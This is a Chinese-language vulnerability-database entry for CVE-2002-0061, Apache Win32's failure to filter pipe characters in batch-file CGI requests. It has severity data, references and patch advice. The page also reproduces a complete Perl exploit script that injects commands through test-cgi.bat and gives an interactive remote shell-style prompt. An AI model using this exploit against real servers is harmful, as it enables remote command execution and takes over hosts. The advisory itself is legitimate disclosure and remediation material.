CVE-2002-0061
CVSS7.5
发布时间 :2002-03-21 00:00:00
修订时间 :2016-10-17 22:15:43
NMCOE    

[原文]Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.


[CNNVD]Apache Win32批处理文件远程执行命令漏洞(CNNVD-200203-045)

        
        Apache是使用最广泛的开放源码的Web服务器程序,分Unix和Windows两种发行版本。
        Windows版本的Apache在处理批处理文件的Web请求没有过滤一些特殊字符(比如'|'),远程攻击者可以利用这个漏洞在目标主机执行任意命令。
        Apache在Windows操作系统下一般都是以SYSTEM权限运行,所以会造成很大的危害。
        2.0.x系列的Windows版Apache默认安装都自带了一个test的批处理文件,这个文件可以利用来执行命令。其它任意可以通过Web访问的批处理文件都可以利用。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:1.3.23Apache Software Foundation Apache HTTP Server 1.3.23
cpe:/a:apache:http_server:2.0.28:betaApache Software Foundation Apache HTTP Server 2.0.28 Beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0061
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200203-045
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101674082427358&w=2
(UNKNOWN)  BUGTRAQ  20020321 Vulnerability in Apache for Win32 batch file processing - Remote command execution
http://online.securityfocus.com/archive/1/263927
(UNKNOWN)  BUGTRAQ  20020325 Apache 1.3.24 Released! (fwd)
http://www.apacheweek.com/issues/02-03-29#apache1324
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/issues/02-03-29#apache1324
http://www.iss.net/security_center/static/8589.php
(UNKNOWN)  XF  apache-dos-batch-command-execution(8589)
http://www.securityfocus.com/bid/4335
(UNKNOWN)  BID  4335

- 漏洞信息

Apache Win32批处理文件远程执行命令漏洞
高危 输入验证
2002-03-21 00:00:00 2006-04-07 00:00:00
远程  
        
        Apache是使用最广泛的开放源码的Web服务器程序,分Unix和Windows两种发行版本。
        Windows版本的Apache在处理批处理文件的Web请求没有过滤一些特殊字符(比如'|'),远程攻击者可以利用这个漏洞在目标主机执行任意命令。
        Apache在Windows操作系统下一般都是以SYSTEM权限运行,所以会造成很大的危害。
        2.0.x系列的Windows版Apache默认安装都自带了一个test的批处理文件,这个文件可以利用来执行命令。其它任意可以通过Web访问的批处理文件都可以利用。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 删除cgi-bin目录下所有批处理文件。
        厂商补丁:
        Apache Group
        ------------
        目前1.3.24win32和2.0.34-BETA win32的发行版本已经修复这个安全问题,请到厂商的主页下载:
        
        http://www.apache.org

- 漏洞信息 (21350)

Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability (EDBID:21350)
windows remote
2002-03-21 Verified
0 SPAX
N/A [点击下载]
source: http://www.securityfocus.com/bid/4335/info

Special characters (such as |) may not be filtered by the batch file handler when a web request is made for a batch file. As a result, a remote attacker may be able to execute arbitrary commands on the host running the vulnerable software.

It should be noted that webservers on Windows operating systems normally run with SYSTEM privileges.

The 2.0.x series of Apache for Microsoft Windows ships with a test batch file which may be exploited to execute arbitrary commands. Since this issue is in the batch file handler, any batch file which is accessible via the web is appropriate for the purposes of exploitation. 

##########################################################
# http://www.securityfocus.com/bid/4335
# http://www.securityfocus.com/bid/2023
# www.spabam.org spabam.tk spabam.da.ru go.to/spabam
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
#####################################################

use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
my $shiz;
$U[1] = "/cgi-bin/test-cgi.bat?|";
$shiz = "|";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
        $output = $results[$X];
        if (defined $output){
        if ($output =~/Apache/){ $webserver = "apache" };
        };
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
        };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };
if ($flag eq "0") {
}else{
     };
};
if ($status eq "not_vulnerable"){

                                };
};
sub choose {
my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = "/cgi-bin/test-cgi.bat?|";
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
                        my $X;
                        for ($X=0; $X<=10; $X++) {
                        $display = $results[$X];
                        if (defined $display){print "$display";};
                                                        };
                        }else{
                        foreach $display (@results){
                            print "$display";
                                                            };
                          };
};
sub exit{
print "\n\n\n



ANDREA SPABAM 2002.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        test-cgi.bat WindowZ 32 Apache vulnerability
        Command Execution Exploit v2.6 by SPABAM 2003

http://www.securityfocus.com/bid/4335
" ;
print "\n
";
print "\n Apache Win32 1.3.6 win32 - Apache 2.0.34 -BETA win32
";
print "\n
note: WebFolder normally on C:\\Programmi\\Apache Group\\Apache\\htdocs";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};

		

- 漏洞信息

769
Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-03-21 Unknow
2002-03-21 Unknow

- 解决方案

Upgrade to version 1.3.24 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站